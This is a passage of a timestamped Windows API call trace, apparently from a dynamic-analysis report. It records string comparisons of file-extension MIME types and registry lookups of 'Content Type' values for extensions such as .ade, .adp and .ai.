lpString1=".boz=application/x-bzip2", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bz=application/x-bzip", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bz2=application/x-bzip2", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cab=application/vnd.ms-cab-compressed", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cat=application/vnd.ms-pki.seccat", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ccn=application/x-cnc", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cco=application/x-cocoa", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cdf=application/x-cdf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cer=application/x-x509-ca-cert", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chm=application/vnd.ms-htmlhelp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".chrt=application/vnd.kde.kchart", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cil=application/vnd.ms-artgalry", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".class=application/java-vm", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".com=application/x-msdos-program", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".clp=application/x-msclip", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpio=application/x-cpio", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cpt=application/mac-compactpro", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".cqk=application/x-calquick", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crd=application/x-mscardfile", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".crl=application/pkix-crl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csh=application/x-csh", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dar=application/x-dar", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dbf=application/x-dbase", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dcr=application/x-director", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".deb=application/x-debian-package", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dir=application/x-director", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.777] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dist=vnd.apple.installer+xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".distz=vnd.apple.installer+xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dll=application/x-msdos-program", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dmg=application/x-apple-diskimage", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc=application/msword", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dot=application/msword", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dvi=application/x-dvi", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".dxr=application/x-director", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ebk=application/x-expandedbook", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".eps=application/postscript", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".evy=application/envoy", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".exe=application/x-msdos-program", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fdf=application/vnd.fdf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fif=application/fractals", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".flm=application/vnd.kde.kivio", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fml=application/x-file-mirror-list", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gzip=application/x-gzip", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gnumeric=application/x-gnumeric", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gtar=application/x-gtar", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gz=application/x-gzip", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hdf=application/x-hdf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hlp=application/winhlp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hpf=application/x-icq-hpf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hqx=application/mac-binhex40", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".hta=application/hta", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ims=application/vnd.ms-ims", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ins=application/x-internet-signup", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".iii=application/x-iphone", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".iso=application/x-iso9660-image", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jar=application/java-archive", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".karbon=application/vnd.kde.karbon", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kfo=application/vnd.kde.kformula", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.778] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kon=application/vnd.kde.kontour", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kpr=application/vnd.kde.kpresenter", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kpt=application/vnd.kde.kpresenter", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kwd=application/vnd.kde.kword", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".kwt=application/vnd.kde.kword", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".latex=application/x-latex", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lha=application/x-lzh", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lcc=application/fastman", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lrm=application/vnd.ms-lrm", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lz=application/x-lzip", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzh=application/x-lzh", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzma=application/x-lzma", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzo=application/x-lzop", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".lzx=application/x-lzx", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m13=application/x-msmediaview", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m14=application/x-msmediaview", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpp=application/vnd.ms-project", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mvb=application/x-msmediaview", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".man=application/x-troff-man", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mdb=application/x-msaccess", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".me=application/x-troff-me", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ms=application/x-troff-ms", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".msi=application/x-msi", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mpkg=vnd.apple.installer+xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mny=application/x-msmoney", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".nix=application/x-mix-transfer", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".o=application/x-object", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".oda=application/oda", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odb=application/vnd.oasis.opendocument.database", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odc=application/vnd.oasis.opendocument.chart", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odf=application/vnd.oasis.opendocument.formula", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odg=application/vnd.oasis.opendocument.graphics", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.779] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odi=application/vnd.oasis.opendocument.image", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odm=application/vnd.oasis.opendocument.text-master", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odp=application/vnd.oasis.opendocument.presentation", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods=application/vnd.oasis.opendocument.spreadsheet", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ogg=application/ogg", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt=application/vnd.oasis.opendocument.text", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".otg=application/vnd.oasis.opendocument.graphics-template", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".oth=application/vnd.oasis.opendocument.text-web", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".otp=application/vnd.oasis.opendocument.presentation-template", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots=application/vnd.oasis.opendocument.spreadsheet-template", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ott=application/vnd.oasis.opendocument.text-template", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p10=application/pkcs10", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p12=application/x-pkcs12", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7b=application/x-pkcs7-certificates", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7m=application/pkcs7-mime", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7r=application/x-pkcs7-certreqresp", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".p7s=application/pkcs7-signature", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".package=application/vnd.autopackage", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pfr=application/font-tdpfr", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pkg=vnd.apple.installer+xml", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf=application/pdf", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pko=application/vnd.ms-pki.pko", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pl=application/x-perl", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pnq=application/x-icq-pnq", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pot=application/mspowerpoint", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps=application/mspowerpoint", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppt=application/mspowerpoint", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ppz=application/mspowerpoint", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ps=application/postscript", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pub=application/x-mspublisher", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.780] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".qpw=application/x-quattropro", cchCount1=24, lpString2=".acrobatsecuritysettings", cchCount2=24) returned 3 [0103.781] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ade", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.781] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ade", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.781] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2a) returned 0x0 [0103.781] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ec, lpcbData=0x19fc20*=0x2a | out: lpType=0x19fc10*=0x1, lpData="application/msaccess", lpcbData=0x19fc20*=0x2a) returned 0x0 [0103.781] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0103.781] CharLowerBuffW (in: lpsz=".ade", cchLength=0x4 | out: lpsz=".ade") returned 0x4 [0103.781] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".adn", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.781] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".adn", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.781] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.781] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.781] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".adp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.781] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".adp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.782] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2a) returned 0x0 [0103.782] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ec, lpcbData=0x19fc20*=0x2a | out: lpType=0x19fc10*=0x1, lpData="application/msaccess", lpcbData=0x19fc20*=0x2a) returned 0x0 [0103.782] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0103.782] CharLowerBuffW (in: lpsz=".adp", cchLength=0x4 | out: lpsz=".adp") returned 0x4 [0103.782] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".adt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.782] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".adt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.782] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.782] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="audio/vnd.dlna.adts", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.782] CharLowerBuffW (in: lpsz="audio/vnd.dlna.adts", cchLength=0x13 | out: lpsz="audio/vnd.dlna.adts") returned 0x13 [0103.782] CharLowerBuffW (in: lpsz=".adt", cchLength=0x4 | out: lpsz=".adt") returned 0x4 [0103.782] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.782] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".adts", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.782] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".adts", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.783] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x28) returned 0x0 [0103.783] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x2449a2c, lpcbData=0x19fc20*=0x28 | out: lpType=0x19fc10*=0x1, lpData="audio/vnd.dlna.adts", lpcbData=0x19fc20*=0x28) returned 0x0 [0103.783] CharLowerBuffW (in: lpsz="audio/vnd.dlna.adts", cchLength=0x13 | out: lpsz="audio/vnd.dlna.adts") returned 0x13 [0103.783] CharLowerBuffW (in: lpsz=".adts", cchLength=0x5 | out: lpsz=".adts") returned 0x5 [0103.783] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ai", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.783] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ai", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.783] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x2e) returned 0x0 [0103.783] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24499ac, lpcbData=0x19fc20*=0x2e | out: lpType=0x19fc10*=0x1, lpData="application/postscript", lpcbData=0x19fc20*=0x2e) returned 0x0 [0103.783] CharLowerBuffW (in: lpsz="application/postscript", cchLength=0x16 | out: lpsz="application/postscript") returned 0x16 [0103.783] CharLowerBuffW (in: lpsz=".ai", cchLength=0x3 | out: lpsz=".ai") returned 0x3 [0103.783] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.783] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".aif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.783] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".aif", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.784] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x16) returned 0x0 [0103.784] RegQueryValueExW (in: 